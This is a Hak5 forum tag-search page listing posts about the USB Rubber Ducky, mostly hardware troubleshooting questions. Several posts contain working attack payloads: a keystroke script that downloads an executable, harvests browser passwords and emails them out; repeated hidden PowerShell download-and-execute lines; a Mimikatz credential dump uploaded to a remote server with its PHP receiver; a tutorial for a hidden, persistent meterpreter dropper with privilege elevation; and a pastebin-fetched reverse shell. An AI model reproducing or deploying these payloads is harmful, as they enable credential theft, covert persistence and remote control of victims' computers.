Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'rubber ducky'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 24 results

  1. Sw1tchbl4d3

    USB Rubber Ducky SD card

    Hello Hackers I was wondering if the usb rubber ducky requires a certain standard of micro sd card, what i mean by this is, does it take a certain storage size and does any brand of micro sd card work with the ducky as i accidentally corrupted it beyond repair XD thanks for your help in advance . Kind regards, and hack all the things. SW1TCHBL4D3
  2. nebulastico

    Help, USB Rubber ducky dead!

    Hi everyone, I have a usb Rubber Ducky, in perfect conditions. Last time I used it i was trying to change firmware to a Twin device, and I leave it like 1 year without using it. Yesterday I tried to reset to default firmware but I cant put it on DFU mode, no led ligths turn on, nothing happens when I plugin it. Thanks :'(
  3. As a few of you people may know, there is this new "bad USB" going around that can supposedly do everything a duck can do but for $3 !! My question is, what disadvantages does it have? Thanks in advance, Luna
  4. pixelz11

    Original Bin file

    What does the root rubber ducky bin file do?
  5. Robert.sz

    grab browsers password

    Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  6. In the HAK5 episode How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky - Hak5 2110 Darren showed a longer way of getting a reverse shell using a longer but a single stage binary of a netcat like tool, but i can't seem to find the original code he used, i kinda want to get a hold of it to see if i can make it run a tiny bit faster but still be a single stage payload. Anyone know where i can get the original(or something close to it) code?
  7. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  8. Hi I realize the all the scripts only work at the second try. Firsttime I plug in the rubber ducky it never works. It looks like this is related to the installation of the stick on the new system. Second plug in it works fine. Do you have the same problem? Is there any solution for this? Thanks for your feedback CR
  9. Recently my sony xa ultra running android 6.0.1's phone battery died and after charging it, my 4 digit pin number had changed. Checking the sony forum, I see this has happened to others. This phone has two lockscreens- one at start up which says "android pin" that I can enter the pin in and it accepts, and the second, which had the same 4 digit pin, that no longer accepts it. Unfortunately, my contacts and text messages never backed up to my external SD card (but thank god my photos and videos did) and Im in the middle of what could be a difficult family legal situation where I desperately need those texts. After searching around the web I came across a few ways I could gain access to the phone without risking losing that data. I saw there is a bluetooth exploit, a possible wifi exploit, a way to deliver malware to my own phone via sms and finally rubber ducky. Never thought I would have to hack into my own phone, but here we are LOL. My skills are limited by way of the first couple of options so the rubber ducky seems like the best bet. However, I am not seeing too much info about the rubber ducky's ability to crack an android 6's pin lock, and judging from a link I posted below that was on this forum, it seems like it could work. That said, I have found a few tutorials on how to use the rubber ducky and code any changes I need, so I just have a few questions and would really appreciate your expertise here, everyone. 1) does the rubber ducky definitely work on android 6? or am I misreading what I find on the forums? 2) is there another way I am not aware of? I dont want to manually enter 10,000 pin combinations, but I am desperate enough that I actually have an excel file with all the possible combinations and have started entering them from 0000....LOL 3) and if the rubber ducky does work on android 6, does anyone know if any of the code can work straight out of the box with the sony xa ultra? I found the github links and tutorial, but I dont want to make any missteps. Thank you for your time. This has been driving my nuts. If anything, ive gotten a crash course over the last 15 hours of googling on how my phone can be protected from hackers LOL LOL
  10. Casetti

    Help

    Hello I recently purchased a USB Rubber Ducky and I soon flashed it with twin duck. I then a script on the SD card and plug it in to test the payload. The ducky is just flashing from Green to red countinously. A little help would be great. Thank you, Cassetti
  11. Hello Hackers !!! I am new into infosec practically i was learning before but now into industry work so i am fed up of searching different methodology, tools, frameworks. I am stucked with something real life scenarios, there is wifi router which have 10 users. Me as admin of that router, how can i access these 10 users (PC, Andriod, etc) ? I tried wireshark, and many other stuff didnt get anything suitable? can i do this via adding a default welcome page to my router if some one connect will have to download something or something like this? a Newbie need help ;D
  12. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  13. Patr

    USB Rubber Ducky

    Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  14. Patr

    Downoload Payload

    Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  15. Lord C

    Bluetooth Rubber Ducky

    Hi guys, I've been playing around trying to create a Bluetooth version of Rubber Ducky working. Not sure how useful that would be, but I'm in the very early stages. Have been experimenting with this beauty: BBC micro:bit Most 11/12 year olds in the UK will have received one of these in school last year. The BBC ran a programme that allowed schools to apply for free micro:bits for all of Year 7 (6th grade). There's a friendly online interface to program them in Python, but you can actually compile C++ for these badboys. They're available for under £15 / $18: http://microbit.org/resellers/, hence making good little gadgets to mess around with for a BT Rubber Ducky. The micro:bit has a few pins available, a USB port, a small bluetooth antenna, it's very small and can be battery powered (or USB powered). On the front there are 15 LED lights and two buttons to play with: You can program the micro:bit to connect via Bluetooth, with little security (no PIN or anything). Then you can use the two buttons to send commands to the computer or smartphone. At the moment, I'm only able to send ASCII commands, so I've been mapping out the special commands in an ASCII/latin table. I haven't yet figured out how to use the Windows key, but I have managed to take a screenshot ("\x8C") and save a file with the name pwned ("\x99,s,pwned,\n"). Sample file available here, just drag and drop it onto your micro:bit, connect to 'ducky' via BT, the left button will take screenshots, the right button will save files. Code is available here, hopefully others will be able to assist with this experiment :).
  16. Robert.sz

    grab browsers password

    Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  17. Garfield025

    15 seconds script

    Hi, I've been trying to set up the script for some time, which is the following: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style, in the first part it says the following: REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" ENTER DELAY 15000 Where can I upload the files and how? The rx.php where it is put, on the server? <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> How do I execute it? I would very much appreciate someone helping me step by step to do it.
  18. biob

    Hak5 artwork

    https://instagram.com/p/BatFZAIA8Pk/ Anyone know where I can find the Packet Squirrel and Ducky version?
  19. Vengeance

    Meterpreter over WAN(need help)

    I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  20. Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius
  21. thegrizzlyonedge

    SSID Names and Passwords

    I posted this in a seperate HAK5 forum room. How do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.
  22. hi guys i've a big proble, in the last weeks i won a usb rubber ducky during an hackathon but the replay buttons seems broken. When i press it the rubber ducky doesn't replay the script, what could be the problem?
  23. h13kerlin4r1x

    USB Rubber Ducky ISSUE

    Hi guys, I just bought the rubber ducky and flashed it to the Twin Duck mode. Well the twin duck mode is working pretty much cool infact iam able to browse through files in my SD card and the one which comes with the ducky is also executing a Hello World Payload but when I make my own payload and put the inject.bin file the ducky doesnt show up rather it just show a red light for about a second and then theres no light neither the payload works. Ive tried to swap SD cards but that does'nt solve my problem either?
  24. Just received the brand new bunny, however. From what i can see it does not come with any other keyboard support then US (us.json). Any ATM for full keyboard support like the rubber ducky has? Any simple way of porting the language files from rubber ducky to this? I did take a look at the HID map to try to map my own xxx.json, i failed when it came to multiple key combination resulting in one output key. Any specific method to make this process ALLOT easier?
×